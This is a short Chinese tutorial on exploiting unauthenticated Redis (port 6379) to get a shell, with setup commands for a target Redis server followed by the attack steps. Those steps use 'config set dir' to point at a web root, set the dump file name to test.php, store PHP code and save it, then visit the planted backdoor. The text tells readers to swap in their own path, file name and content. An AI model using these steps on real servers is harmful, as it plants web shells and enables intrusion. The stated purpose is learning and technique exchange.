数据库服务类--Redis--未授权访问&终端Getshell

免责声明:本文仅做技术交流与学习.

目录

前提条件:

windows上开启redis服务:

Linux上创建&开启redis服务:

操作:

1-连接靶机redis

2-写入webshell

3-访问后门


redis--->webshell

Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)

前提条件:

端口开放(6379)

目录结构清晰

windows上开启redis服务:

sql 复制代码
windows:
redis-server.exe redis.windows.conf
redis-cli.exe -h 127.0.0.1 -p 6379

Linux上创建&开启redis服务:

复制代码
复制代码
1、下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
​
2、解压编译
tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译
​
3、配置及启动
cd src/ #进入src目录 
cp redis-server /usr/bin/ 
cp redis-cli /usr/bin/      #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd ..   # 返回上一级目录
cp redis.conf /etc/     #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf  # 使用/etc/目录下的redis.conf文件中的配置启动redis服务

操作:

1-连接靶机redis

2-写入webshell

sql 复制代码
config set dir /www/wwwroot/IP
config  set dbfilename test.php
set test "<?phpphpinfo();?>"
bgsave
save

目录,文件名自己改

写入内容自己改...

3-访问后门路径

--上线...


相关推荐
RestCloud1 天前
SQL Server到Hive:批处理ETL性能提升30%的实战经验
数据库·api
RestCloud1 天前
为什么说零代码 ETL 是未来趋势?
数据库·api
ClouGence1 天前
CloudCanal + Paimon + SelectDB 从 0 到 1 构建实时湖仓
数据库
BingoGo1 天前
2025 年 PHP 常见面试题整理以及对应答案和代码示例
后端·php
LH_R1 天前
OneTerm开源堡垒机实战(三):功能扩展与效率提升
运维·后端·安全
DemonAvenger1 天前
NoSQL与MySQL混合架构设计:从入门到实战的最佳实践
数据库·mysql·性能优化
AAA修煤气灶刘哥2 天前
别让Redis「歪脖子」!一次搞定数据倾斜与请求倾斜的捉妖记
redis·分布式·后端
AAA修煤气灶刘哥2 天前
后端人速藏!数据库PD建模避坑指南
数据库·后端·mysql
你的人类朋友2 天前
什么是API签名?
前端·后端·安全
RestCloud2 天前
揭秘 CDC 技术:让数据库同步快人一步
数据库·api